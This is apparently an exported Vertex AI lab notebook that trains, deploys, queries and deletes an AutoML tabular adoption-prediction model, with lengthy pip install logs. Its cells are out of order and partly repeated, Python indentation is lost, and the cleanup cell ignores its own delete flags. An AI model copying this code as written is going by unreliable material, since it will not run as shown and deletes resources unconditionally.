Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernel. After you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
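###Markdown
Optionally, once the kernel has restarted you can confirm which package versions the new kernel picked up before moving on. This is just a quick check of the installs above.
###Code
# Confirm the versions of the freshly installed client libraries
! pip show google-cloud-aiplatform google-cloud-storage | grep -E "Name|Version"
###Output
_____no_output_____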
###Markdown
Set your project ID. **If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
Timestamp. If you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket. **The following steps are required, regardless of your notebook environment.** This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored. Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets. You may also change the `REGION` variable, which is used for operations throughout the rest of this notebook. Make sure to [choose a region where Vertex AI services are available](https://cloud.google.com/vertex-ai/docs/general/locations). You may not use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
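###Markdown
You can also verify the bucket programmatically with the Cloud Storage Python client installed earlier. This is a minimal sketch; it assumes the `PROJECT_ID` and `BUCKET_NAME` variables defined in the cells above.
###Code
# Check that the bucket exists and report where it was created
from google.cloud import storage

storage_client = storage.Client(project=PROJECT_ID)
bucket = storage_client.get_bucket(BUCKET_NAME.replace("gs://", ""))
print(bucket.name, bucket.location)
###Output
_____no_output_____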
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
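###Markdown
Before creating a managed dataset, it can help to peek at the CSV you just copied. The sketch below assumes `pandas` and `gcsfs` are available in the notebook environment so that `pd.read_csv` can read `gs://` paths directly.
###Code
# Preview the first few rows of the training data straight from Cloud Storage
import pandas as pd

preview = pd.read_csv(gcs_source, nrows=5)
print(preview.columns.tolist())
preview.head()
###Output
_____no_output_____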
###Markdown
Import Vertex SDK for Python. Import the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
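###Markdown
`init` can also take a default staging bucket so that later SDK calls do not need one passed explicitly. This is optional; the sketch reuses the bucket created above.
###Code
# Optionally register a default staging bucket for subsequent SDK calls
aiplatform.init(project=PROJECT_ID, location=REGION, staging_bucket=BUCKET_NAME)
###Output
_____no_output_____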
###Markdown
Tutorial. Now you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSV. This section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
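###Markdown
As a quick sanity check before training, you can list the columns Vertex AI detected in the managed dataset. `column_names` is available on `TabularDataset` in recent versions of the SDK; treat this as an optional sketch.
###Code
# List the columns detected in the tabular dataset
print(ds.column_names)
###Output
_____no_output_____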
###Markdown
Launch a Training Job to Create a Model. Once the training job is defined, you create the model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs an AutoML tabular training job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around an hour to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
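###Markdown
The deprecation warning above suggests using `column_specs` instead of `column_transformations`. The sketch below shows an equivalent job definition with that argument, using the same column names as above; the display name is just illustrative, and newer SDK versions also provide `AutoMLTabularTrainingJob.get_auto_column_specs` to build this dictionary for you.
###Code
# Equivalent job definition using column_specs (a dict of column name -> transformation type)
job_with_specs = aiplatform.AutoMLTabularTrainingJob(
    display_name="train-petfinder-automl-specs",
    optimization_prediction_type="classification",
    column_specs={
        "Type": "categorical",
        "Age": "numeric",
        "Breed1": "categorical",
        "Color1": "categorical",
        "Color2": "categorical",
        "MaturitySize": "categorical",
        "FurLength": "categorical",
        "Vaccinated": "categorical",
        "Sterilized": "categorical",
        "Health": "categorical",
        "Fee": "numeric",
        "PhotoAmt": "numeric",
    },
)
###Output
_____no_output_____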
###Markdown
Deploy your model. Before you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things: 1. Creates an `Endpoint` resource to which the `Model` resource will be deployed. 2. Deploys the `Model` resource to the `Endpoint` resource. Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
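###Markdown
`deploy` also accepts scaling parameters if you want to control serving capacity explicitly. The sketch below shows the same call with autoscaling bounds; the replica counts are illustrative values, not a recommendation, and you would use this in place of the simpler call above rather than in addition to it.
###Code
# Alternative to the previous cell: deploy with explicit autoscaling bounds
endpoint = model.deploy(
    machine_type="n1-standard-4",
    min_replica_count=1,
    max_replica_count=2,
)
###Output
_____no_output_____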
###Markdown
Predict on the endpoint. * This sample instance is taken from an observation in which `Adopted` = **Yes**. * Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` tell Vertex AI how to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
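###Markdown
For AutoML tabular classification, each entry in `prediction.predictions` is a dictionary with parallel `classes` and `scores` lists. The sketch below pulls out the highest-scoring class for the instance sent above; it assumes that response format.
###Code
# Extract the highest-scoring class from the first prediction
pred = prediction.predictions[0]
best_class, best_score = max(
    zip(pred["classes"], pred["scores"]), key=lambda pair: pair[1]
)
print(f"Predicted Adopted = {best_class} (score {best_score:.3f})")
###Output
_____no_output_____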
###Markdown
Undeploy the model. To undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter: - `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning up. To clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#shutting_down_projects) you used for the tutorial. Otherwise, you can delete the individual resources you created in this tutorial: the training job, the model, the endpoint, and the Cloud Storage bucket. **Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
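###Markdown
The cleanup cell above removes the training job, model, endpoint, and (optionally) the bucket, but not the managed tabular dataset created earlier. If you also want to remove it, a small sketch using the `ds` variable from the dataset-creation step:
###Code
# Delete the managed tabular dataset created for this tutorial
ds.delete()
###Output
_____no_output_____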
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
